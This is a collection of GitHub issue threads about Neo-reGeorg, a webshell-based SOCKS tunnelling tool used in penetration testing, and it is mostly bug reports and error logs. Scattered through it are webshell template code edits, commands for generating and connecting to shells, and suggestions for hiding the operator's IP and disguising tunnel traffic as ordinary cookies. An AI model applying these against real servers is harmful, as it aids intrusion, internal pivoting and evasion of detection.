l-codes / neo-regeorg
Neo-reGeorg is a project that seeks to aggressively refactor reGeorg
License: GNU General Public License v3.0
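The egress IP of a cloud function changes constantly; if reGeorg could run on a cloud function, it would mean one's own IP could be perfectly hidden.
For the underlying principle, see: "Freeloading on CDN to build a proxy pool whose IPs can never all be blocked"
One implementation: https://github.com/Sakurasan/scf-proxy
But scf-proxy only supports the HTTP protocol; with reGeorg, any TCP protocol could be supported as well
PHP version 5.3.8; the page can be accessed normally in a browser,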
curl http://114.114.114.114/watermark/201808/tunnel.php
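returns
After running the command locally the connection shows as normal, but after setting up Proxifier, trying to connect to 192.168.8.51 (which corresponds to 114.114.114.114) reports an error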
+------------------------------------------------------------------------+
Log Level set to [ERROR]
Starting socks server [127.0.0.1:8888], tunnel at [http://114.114.114.114/watermark/201808/tunnel.php]
+------------------------------------------------------------------------+
[CRITICAL] Bad KEY or non-neoreg server
[ERROR ] [RUN] [192.168.8.55:81] Remote failed
Exception in thread Thread-1:
Traceback (most recent call last):
File "C:\Python3.7.7\lib\threading.py", line 926, in _bootstrap_inner
self.run()
File "D:\Neo-reGeorg\neoreg.py", line 415, in run
if self.handleSocks(self.pSocket):
File "D:\Neo-reGeorg\neoreg.py", line 261, in handleSocks
return self.parseSocks5(sock)
File "D:\Neo-reGeorg\neoreg.py", line 225, in parseSocks5
raise RemoteConnectionFailed("[%s:%d] Remote failed" % (target, targetPortNum))
RemoteConnectionFailed: [192.168.8.55:81] Remote failed
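I don't know whether I am using it incorrectly or there is some other problem. I am sure the connection key is correct; please advise.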
python neoreg.py generate -k password -f 404.html --httpcode 404
[ Github ] https://github.com/L-codes/neoreg
+------------------------------------------------------------------------+
Log Level set to [INFO]
Starting socks server [127.0.0.1:1080]
Tunnel at:
http://192.168.122.1:8080/tunnel.jsp
+------------------------------------------------------------------------+
[INFO ] Checking if Georg is ready
Traceback (most recent call last):
File "neoreg.py", line 673, in
askGeorg(conn, urls, redirect_urls)
File "neoreg.py", line 461, in askGeorg
log.error('Expect Response: ' + BASICCHECKSTRING[0:100])
TypeError: can only concatenate str (not "bytes") to str
404.html content:
page is not found!
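When the website does not support gzip compression, it reports the error "Georg is not ready, please check URL."
Changing it to conn.headers['Accept-Encoding'] = '' makes it connect normally
I looked at the source code; some of the key headers are actually fairly conspicuous
httpx supports HTTP/2,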
pip3 install httpx
pip3 install 'httpx[http2]'
Replace requests.Session() with httpx.Client(http2=True)
Use HTTP/2 multiplexing to reduce handshakes.
How to use the parameter -r ? Support Exchange aspx?
Example:
Load balancing
Server 1 is 19.16.1.120 with neo-regeorg test.aspx, intranet ip is 172.10.10.120
Server 2 is 19.16.1.121 without neo-regeorg, intranet ip is 172.10.10.121
python3 neoreg.py -u https://19.16.1.120/test.aspx -k passssss -r https://172.10.10.120/test.aspx
If it accessed 19.16.1.121, got 404:
[INFO] Checking if Georg is ready
[WARNING] Using redirection will affect performance when the response code >= 400
[WARNING] Expect Response: b''
[WARNING] Real Response: b'\r\n\r\n \r\n <title>The resource cannot be found.</title>\r\n <'
[ERROR] Georg is not ready, please check URL and KEY. rep: [404] Not Found
[ERROR] You can set the --skip parameter to ignore errors
If it accessed 19.16.1.120, got 200, but Response is null:
[INFO] Checking if Georg is ready
[WARNING] Expect Response: b''
[WARNING ] Real Response: b''
[ERROR] Georg is not ready, please check URL and KEY. rep: [200] OK
[ERROR] You can set the --skip parameter to ignore errors
But if I do not use -r, and if it accessed 19.16.1.120, everything is right.
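Could the author release a GUI version, where entering the URL and password is enough to start it?
<html><p>raw base64 data Hr862cRcRES_9AFMojsEHA</p></html>
I read the neoreg.py source code and the corresponding webshell source code and tried modifying them: a marker is added to the returned data, and a regular-expression match is then used to solve this problem.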
neoreg.py
# In the session class's reader function, add a data-processing function
def mapping_body(self, data):
    re_pattern = self.session_mark() + r'(.*?)' + self.session_mark()  # process the response data using the built-in mark value
    re_metch_result = re.search(re_pattern, data)
    if re_metch_result:
        return re_metch_result.group(1)
    else:
        return ''
# Process the data returned by requests with the newly added function
if status == V["OK"]:
    data = self.mapping_body(response.content)  # added mapping_body call: regex-process the returned data
    if len(data) == 0:
        sleep(READINTERVAL)
        continue
    else:
        data = self.decode_body(data)
templates/tunnel.php
// Modify the echo directly
if ($running) {
    header('X-STATUS: OK');
    header("Connection: Keep-Alive");
    echo $mark . strtr(base64_encode($readBuffer), $en, $de) . $mark; // concatenate mark directly
} else {
    header('X-STATUS: FAIL');
}
templates/tunnel.aspx
while (c > 0) {
    byte[] newBuff = new byte[c];
    System.Buffer.BlockCopy(readBuff, 0, newBuff, 0, c);
    string b64 = Convert.ToBase64String(newBuff);
    Response.BinaryWrite(mark + Encoding.Default.GetBytes(StrTr(b64, en, de)) + mark); // concatenate the mark keyword on output
    readLen += c;
    if (c < READBUF || readLen >= maxRead)
        break;
    c = s.Receive(readBuff);
}
templates/tunnel.ashx
while (c > 0) {
    byte[] newBuff = new byte[c];
    System.Buffer.BlockCopy(readBuff, 0, newBuff, 0, c);
    string b64 = Convert.ToBase64String(newBuff);
    context.Response.BinaryWrite(mark + System.Text.Encoding.Default.GetBytes(StrTr(b64, en, de)) + mark); // concatenate the mark keyword on output
    readLen += c;
    if (c < READBUF || readLen >= maxRead)
        break;
    c = s.Receive(readBuff);
}
templates/tunnel.jsp
None
templates/tunnel.jspx
None
Log Level set to [ERROR]
Starting SOCKS5 server [127.0.0.1:1080]
Tunnel at:
http://120.202.xxx.xxx:8080/admin/css/index1.jsp
+------------------------------------------------------------------------+
[ERROR ] Georg is not ready, please check URL.
The current request looks like this
GET /t.php HTTP/1.1
Host: myweibo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Ghqgvikywyowmvo: UiTmMveJTNWkkm8wRUn4VwHBfkng
Yuwjttakkvh: wmwm501dsNWz50F/Q9icFyI=
Cookie: PHPSESSID=7tpphjesf30a2rbudhodsl62ej;
These two items in the request headers look rather odd; moved into the Cookie they would look more normal
Ghqgvikywyowmvo: UiTmMveJTNWkkm8wRUn4VwHBfkng
Yuwjttakkvh: wmwm501dsNWz50F/Q9icFyI=
becomes
GET /t.php HTTP/1.1
Host: myweibo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=7tpphjesf30a2rbudhodsl62ej; Ghqgvikywyowmvo=UiTmMveJTNWkkm8wRUn4VwHBfkng; Yuwjttakkvh= wmwm501dsNWz50F/Q9icFyI=
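Or go a step further and encode these two lines, so that in the Cookie it becomes the following, with Auth picked at random from a set of similar words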
GET /t.php HTTP/1.1
Host: myweibo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=7tpphjesf30a2rbudhodsl62ej; Auth=xxxxx
This improved version looks sick, can you just translate the README into English please? Or move the actual README to README.XX.md, where XX is the country code of the language it is written in, and make a README.md or README.en.md in English.
OS 名称: Microsoft Windows Server 2012 R2 Datacenter
OS 版本: 6.3.9600 暂缺 Build 9600
java.runtime.version = 1.6.0_14-b08
jboss
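Forward proxying works with Behinder, but neo reports a 500 error
pytohn: python is misspelled
Like Behinder and Godzilla: enter the URL, password and listening port, which is convenient for batch management and reuse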
+------------------------------------------------------------------------+
Log Level set to [WARNING]
Starting socks server [127.0.0.1:1080]
Tunnel at:
https://www.example.de/files/iamges/tunnel.ashx
+------------------------------------------------------------------------+
[ERROR ] [FORWARD] [216.58.215.238:80] HTTP [403]: Shutting down
[ERROR ] [FORWARD] [52.143.255.96:80] HTTP [403]: Shutting down
jsp(x) certificate verification problem:
Error 500 Internal Server Error.
When I check it with curl: , no errors.
How to fix it?
Win10, Python 3.7 environment
[ERROR ] Georg is not ready, please check url. rep: [404] Not Found
t3.jsp:27:190: The attribute "trimDirectiveWhitespaces" is supported by JSP 2.1 or higher version.
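Some IIS servers only support ASP and have no .NET configured
It does not work in a Docker WordPress container.
The WordPress image I am using is wordpress:php7.2-apache
Example: I connect to 192.168.1.4:22 with PuTTY through the proxy
On the 192.168.1.4 machine I can see that the connection on port 22 has been established, but no packets come back and it just hangs there.
How do I solve this!!
The generated PHP webshell seems to work only in an Apache server environment.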
+------------------------------------------------------------------------+
[ERROR ] Expect Response:
[ERROR ] Real Response:
[ERROR ] Georg is not ready, please check URL and KEY. rep: [200] OK
The command is as follows:
python neoreg.py -u http://1.1.1.1/neo.php -k 123456 -H "Authorization: Basic YWRtaW46cXdlcnR 5"
As in the title
--local-dns Local read buffer, max data to be sent per
POST.(default: 2048 max: 2600)
--read-buff Bytes Local read buffer, max data to be sent per
POST.(default: 2048 max: 2600)
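The description of --local-dns here is wrong
Does this solve the problem of the old reGeorg JSP script not supporting the WebLogic middleware?
System: Windows 10
Environment: phpstudy_pro 8.1.0.6
PHP versions: php5.6.9 and php7.3.4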
[CRITICAL] Bad KEY or non-neoreg server
[ERROR ] [RUN] [127.0.0.1:3389] [NOT Cookie Response] Remote failed
Exception in thread Thread-1:
Traceback (most recent call last):
File "/usr/lib/python3.7/threading.py", line 926, in _bootstrap_inner
self.run()
File "neoreg.py", line 415, in run
if self.handleSocks(self.pSocket):
File "neoreg.py", line 261, in handleSocks
return self.parseSocks5(sock)
File "neoreg.py", line 225, in parseSocks5
raise RemoteConnectionFailed("[%s:%d] [NOT Cookie Response] Remote failed" % (target, targetPortNum))
RemoteConnectionFailed: [127.0.0.1:3389] [NOT Cookie Response] Remote failed
tunnel.php and tunnel.nosocket.php both give the same error; Kali's LAMP works fine, though.
I hope it can be made compatible with connections to the original reGeorg; I ran into an original reGeorg memory shell injected by a tool, and raising issues with that tool's author asking to change it to Neo-reGeorg got nowhere.
"Because of an error in data encryption, this session will end. Please try connecting to the remote computer again."
[ERROR ] 'Failed connecting to target'
[ERROR ] [127.0.0.1:443] Remote failed
[ERROR ] 'Failed connecting to target'
[ERROR ] [127.0.0.1:443] Remote failed
[ERROR ] 'Failed connecting to target'
[ERROR ] [127.0.0.1:443] Remote failed
[ERROR ] 'Failed connecting to target'
[ERROR ] [127.0.0.1:443] Remote failed
[ERROR ] 'Failed connecting to target'
[ERROR ] [127.0.0.1:443] Remote failed
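Cloned on Linux
The generated PHP script ends with an empty line,
which causes '\n' to always be returned when there is no data
Removing the trailing empty line or leaving the script's PHP tag unclosed fixes it
May I add the Neo-reGeorg project to Godzilla?
I don't know whether this affects the connection?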
/usr/lib/python3/dist-packages/urllib3/connectionpool.py:794: InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.org/en/latest/security.html
InsecureRequestWarning)
BT Panel, PHP 8.0 environment, behind CF. I don't know why. The result is the same without CF.
Log Level set to [INFO]
Starting SOCKS5 server [127.0.0.1:1080]
Tunnel at:
https://www.xxxx.com/nat.php
+------------------------------------------------------------------------+
[INFO ] Checking if Georg is ready
[WARNING ] Server Session expired
[WARNING ] Automatically append Cookies: __cfduid=dcafee59db222c06c30d13673c175910f1613723661;PHPSESSID=1rp16km3ko7aagtn3ib62mnv9g;
[INFO ] Georg says, 'All seems fine'
[CRITICAL ] [Errno 10013]
The name 'HTTPCODE' does not exist in the current context
Can not connect to the server
The error is as follows:
HTTP Status 500 -
type Exception report
message
description The server encountered an internal error () that prevented it from fulfilling this request.
exception
org.apache.jasper.JasperException: Unable to compile class for JSP
An error occurred at line: 2 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Syntax error, 'for each' statements are only available if source level is 5.0
An error occurred at line: 2 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
The type Enumeration is not generic; it cannot be parameterized with arguments <NetworkInterface>
An error occurred at line: 2 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Syntax error, parameterized types are only available if source level is 5.0
An error occurred at line: 2 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
The type Enumeration is not generic; it cannot be parameterized with arguments <InetAddress>
An error occurred at line: 2 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Syntax error, parameterized types are only available if source level is 5.0
An error occurred at line: 108 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
The type List is not generic; it cannot be parameterized with arguments <String>
An error occurred at line: 108 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Syntax error, parameterized types are only available if source level is 5.0
An error occurred at line: 108 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Syntax error, 'for each' statements are only available if source level is 5.0
An error occurred at line: 108 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Syntax error, 'for each' statements are only available if source level is 5.0
An error occurred at line: 108 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Can only iterate over an array or an instance of java.lang.Iterable
org.apache.jasper.servlet.JspServletWrapper.handleJspException(JspServletWrapper.java:512)
org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:377)
org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:314)
org.apache.jasper.servlet.JspServlet.service(JspServlet.java:264)
javax.servlet.http.HttpServlet.service(HttpServlet.java:810)
org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:96)
root cause
org.apache.jasper.JasperException: Unable to compile class for JSP
An error occurred at line: 2 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Syntax error, 'for each' statements are only available if source level is 5.0
An error occurred at line: 2 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
The type Enumeration is not generic; it cannot be parameterized with arguments <NetworkInterface>
An error occurred at line: 2 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Syntax error, parameterized types are only available if source level is 5.0
An error occurred at line: 2 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
The type Enumeration is not generic; it cannot be parameterized with arguments <InetAddress>
An error occurred at line: 2 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Syntax error, parameterized types are only available if source level is 5.0
An error occurred at line: 108 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
The type List is not generic; it cannot be parameterized with arguments <String>
An error occurred at line: 108 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Syntax error, parameterized types are only available if source level is 5.0
An error occurred at line: 108 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Syntax error, 'for each' statements are only available if source level is 5.0
An error occurred at line: 108 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Syntax error, 'for each' statements are only available if source level is 5.0
An error occurred at line: 108 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Can only iterate over an array or an instance of java.lang.Iterable
org.apache.jasper.compiler.DefaultErrorHandler.javacError(DefaultErrorHandler.java:84)
org.apache.jasper.compiler.ErrorDispatcher.javacError(ErrorDispatcher.java:328)
org.apache.jasper.compiler.JDTCompiler.generateClass(JDTCompiler.java:414)
org.apache.jasper.compiler.Compiler.compile(Compiler.java:297)
org.apache.jasper.compiler.Compiler.compile(Compiler.java:276)
org.apache.jasper.compiler.Compiler.compile(Compiler.java:264)
org.apache.jasper.JspCompilationContext.compile(JspCompilationContext.java:563)
org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:305)
org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:314)
org.apache.jasper.servlet.JspServlet.service(JspServlet.java:264)
javax.servlet.http.HttpServlet.service(HttpServlet.java:810)
org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:96)
note The full stack trace of the root cause is available in the Apache Tomcat/5.5.20 logs.
Apache Tomcat/5.5.20